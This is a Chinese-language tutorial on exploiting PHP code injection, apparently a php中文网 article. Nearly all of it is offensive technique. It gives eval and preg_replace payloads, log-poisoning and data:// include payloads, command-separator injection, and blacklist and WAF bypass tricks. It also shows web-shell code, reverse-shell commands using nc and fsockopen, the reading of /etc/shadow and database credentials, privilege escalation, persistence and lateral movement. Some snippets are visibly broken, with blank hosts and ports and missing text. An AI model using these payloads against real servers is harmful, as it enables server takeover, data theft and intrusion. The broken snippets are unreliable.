答案:PHP代码注入是因用户输入未严格过滤,导致恶意代码被执行的漏洞,常见于eval()、preg_replace()、文件包含等场景。攻击者可通过构造payload绕过过滤,执行系统命令或写入Web Shell,最终获取服务器控制权并进行提权、数据窃取和横向移动。
PHP代码注入,简单来说,就是攻击者通过向Web应用程序的输入点提交恶意的PHP代码,利用应用程序对这些输入处理不当,最终导致服务器执行这些恶意代码的一种漏洞。它的核心在于应用程序没有正确地过滤、验证或转义用户输入,使得本应是数据的内容被当作代码来解析和执行。一旦成功利用,攻击者几乎可以完全控制受影响的服务器,从读取敏感文件到安装后门,乃至接管整个系统。
解决方案
PHP代码注入的利用方式多种多样,其本质都是找到应用程序中将用户可控数据当作PHP代码执行的函数或上下文。最直接的利用场景是当用户输入直接传递给
eval()
函数时。例如,如果代码中存在
eval($_GET['code']);
这样的结构,攻击者只需通过URL参数
?code=phpinfo();
就能执行
phpinfo()
,或者
?code=system('ls -la');
来执行系统命令。
然而,现实中的情况往往更隐蔽。
preg_replace()
函数在PHP 5.5.0版本之前,如果使用了
/e
修饰符,其替换字符串会被当作PHP代码执行。例如,
preg_replace('/.*/e', $_GET['inject'], 'subject');
,攻击者可以通过
?inject=phpinfo()
来触发。
另一种常见的路径是文件包含漏洞(LFI)与代码注入的结合。当应用程序使用
include()
或
require()
加载用户指定的文件,且对文件路径没有严格限制时,攻击者可以尝试包含包含恶意PHP代码的文件。这可能包括:
立即学习“PHP免费学习笔记(深入)”;
日志文件注入: 许多Web服务器会将用户请求头(如User-Agent)写入日志。攻击者可以在User-Agent中注入
<?php system($_GET['cmd']); ?>
等代码,然后通过LFI漏洞包含Web服务器的日志文件(如
/var/log/apache2/access.log
),从而执行任意代码。
data://
或
php://filter
伪协议: 攻击者可以直接在URL中构造包含PHP代码的
data://text/plain,<?php system('id'); ?>
,如果
include()
函数没有对协议进行过滤,这段代码就会被执行。
php://input
也可以用于类似目的,但需要通过POST请求发送代码。
更复杂一些的是PHP对象注入(Deserialization Vulnerability)。当应用程序对用户可控的序列化字符串进行
unserialize()
操作时,如果应用程序中存在定义了”魔术方法”(如
__wakeup()
,
__destruct()
,
__toString()
等)的类,攻击者可以构造一个恶意的序列化对象,在反序列化过程中触发这些魔术方法,进而执行任意代码。这通常需要结合特定的”gadget chain”才能实现。
此外,一些命令执行函数(如
system()
,
exec()
,
shell_exec()
,
passthru()
等)虽然不是直接执行PHP代码,但它们通常是代码注入的终极目标。如果用户输入直接或间接地拼接到这些函数的参数中,攻击者可以通过注入命令分隔符(如
;
,
&
,
|
,
&&
,
||
)来执行任意系统命令。例如,
system("ls " . $_GET['dir']);
可以通过
?dir=; id
来执行
id
命令。
识别潜在的PHP代码注入点:不仅仅是
eval()
eval()
要找到PHP代码注入点,我们不能只盯着
eval()
,那太局限了。一个真实的应用,漏洞往往藏在不那么显眼的地方。最直接的方法当然是代码审计,仔细审查所有涉及用户输入处理的代码段。我会特别关注那些将用户输入作为参数传递给以下函数的:
eval()
:这是最明显的,直接执行字符串作为PHP代码。
preg_replace()
:特别是带有
/e
修饰符的版本,虽然现在PHP版本大多已弃用,但老旧系统仍可能存在。
include()
,
require()
,
include_once()
,
require_once()
:这些函数如果路径可控,可能导致LFI进而代码执行。
unserialize()
:反序列化漏洞是高级代码注入的一种,需要深入理解PHP对象的生命周期。
create_function()
:这个函数本身可以动态创建匿名函数,如果其参数可控,也是一个注入点。
assert()
:与
eval()
类似,它将字符串作为PHP代码执行。
call_user_func()
,
call_user_func_array()
:如果函数名和参数都可控,可能被滥用。
system()
,
exec()
,
shell_exec()
,
passthru()
,
popen()
,
proc_open()
:这些是系统命令执行函数,虽然不是PHP代码注入本身,但经常是代码注入的最终目标或间接利用路径。
除了代码审计,动态测试也必不可少。我会使用各种渗透测试工具或手动构造请求,对所有可能的输入点(GET参数、POST数据、HTTP头、Cookie等)进行模糊测试(fuzzing)。尝试注入简单的PHP代码片段(如
、
system('id');
)或命令分隔符,观察应用程序的响应和服务器日志。有时候,详细的错误信息会不经意间泄露后端处理逻辑,比如某个函数调用栈,这能为我们提供宝贵的线索。另外,观察HTTP响应头,例如
X-Powered-By: PHP/X.Y.Z
可以帮助我们判断PHP版本,从而推断可能存在的特定版本漏洞。
绕过常见的过滤与防御机制
在实际的渗透测试中,直接注入
system('id');
这样的代码往往会遇到各种过滤和防御机制,比如WAF(Web Application Firewall)或应用层面的输入净化。绕过这些机制,需要一些技巧和创造性思维。
首先,黑名单过滤是最常见的,它会阻止一些危险的函数名或关键字。应对这种过滤,我们可以尝试:
大小写混淆: 例如,
system('id');
或
pHpInfo();
。字符串拼接: 如果
system
被过滤,可以尝试
'sy'.'stem'('id');
。编码: URL编码、Base64编码甚至十六进制编码,例如
eval(base64_decode('cGhwaW5mbygpOw=='));
。但需要注意,目标函数必须能解码这些字符串。使用替代函数: 如果
system()
被禁,可以尝试
passthru()
、
shell_exec()
、
exec()
等功能相似的函数。利用PHP的弱类型特性: 有时可以通过类型转换或比较的漏洞来绕过。反引号执行命令: 在PHP中,反引号
`
内的内容会被当作shell命令执行,例如
`id`
。
其次,WAF通常基于规则集进行检测,它们可能会拦截包含特定模式的请求。绕过WAF则需要更灵活的策略:
HTTP参数污染(HPP): 如果WAF只检查第一个同名参数,我们可以发送
?cmd=id&cmd=;
,期望后端处理时将两个
cmd
参数合并。请求方法变换: 尝试将GET请求改为POST,或者反之,看WAF是否对所有方法都进行同等强度的检测。编码变体: 尝试双重URL编码、Unicode编码或其他不常见的编码方式,可能会绕过WAF的正则匹配。利用注释、换行符和制表符: 在payload中插入
/* */
注释、
%0a
(换行符)或
%09
(制表符),有时可以打乱WAF的匹配模式。非标准HTTP头: 有些WAF规则可能只关注请求体或URL,而忽略某些HTTP头。分块传输编码: 尝试使用
Transfer-Encoding: chunked
来发送请求,有时可以规避WAF对完整请求体的检测。利用WAF自身的解析差异: 某些WAF在解析HTTP请求时可能与Web服务器存在差异,导致WAF认为请求是无害的,而Web服务器则正常解析并执行恶意代码。
最后,白名单过滤是最难绕过的,因为它只允许特定的安全字符或模式。在这种情况下,我们可能需要寻找逻辑漏洞,或者尝试利用白名单允许的字符来构造一个合法的、但能导致非预期行为的payload。这通常需要对应用程序的业务逻辑和代码实现有更深入的理解。
进一步的利用:从代码注入到服务器控制
成功注入PHP代码仅仅是开始,真正的目标往往是获取对目标服务器的完全控制权。一旦我们能够执行任意PHP代码,接下来的一系列操作就变得顺理成章。
最常见的下一步是上传一个Web Shell。一个简单的Web Shell可能只是
<?php system($_GET['cmd']); ?>
,将其写入一个可访问的文件(如
shell.php
),然后我们就可以通过访问
shell.php?cmd=ls -la
来执行任意系统命令。更高级的Web Shell(如China Chopper、Weevely等)则提供文件管理、数据库管理、端口扫描等多种功能,极大地便利了后续操作。通常,我们会利用
file_put_contents()
或
fwrite()
等PHP函数将Web Shell的内容写入服务器上的某个目录。
如果条件允许,获取一个反向Shell(Reverse Shell)会提供一个更稳定、更交互式的控制通道。反向Shell意味着目标服务器主动连接到攻击者的机器,建立一个命令行会话。这通常通过执行以下PHP代码来实现:
利用
system()
或
exec()
执行
nc
命令:
system('nc -e /bin/sh ');
(注意,
nc -e
在某些系统上可能不可用或被禁用)。利用PHP自身的socket函数:
$sock=fsockopen("",);exec("/bin/sh -i &3 2>&3");
这段代码会创建一个socket连接,并将
/bin/sh
的输入、输出、错误流重定向到这个socket。
获得Shell之后,我们就可以进行数据窃取,读取服务器上的敏感文件,例如:
/etc/passwd
或
/etc/shadow
:获取用户账户信息。数据库配置文件:如
config.php
,获取数据库连接凭据。应用程序源代码:分析更多漏洞,或获取敏感业务逻辑。其他敏感数据:如用户上传的文件、临时文件等。
权限提升也是一个关键环节。Web服务器通常以低权限用户运行(如
www-data
),为了获得更高的权限(如root),攻击者会尝试:
查找SUID或SGID文件: 这些文件以文件所有者或组的权限运行,可能存在漏洞。内核漏洞: 利用操作系统内核的已知漏洞进行提权。错误配置: 例如,
sudo -l
命令可能显示当前用户可以无需密码执行某些高权限命令。
最后,为了保持持久性和横向移动,攻击者可能会在服务器上留下后门,修改启动脚本,或者利用当前服务器作为跳板,扫描和攻击内网中的其他机器。这些操作都是为了确保即使Web Shell被清除,也能重新获得对服务器的控制,并扩大攻击范围。整个过程是一个步步为营的链条,每一步的成功都为下一步的深入利用奠定基础。
以上就是PHP代码注入如何利用_PHP代码注入漏洞利用方法详解的详细内容,更多请关注php中文网其它相关文章!
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 chuangxiangniao@163.com 举报,一经查实,本站将立刻删除。
发布者:程序猿,转转请注明出处:https://www.chuangxiangniao.com/p/1274338.html
微信扫一扫 
支付宝扫一扫 
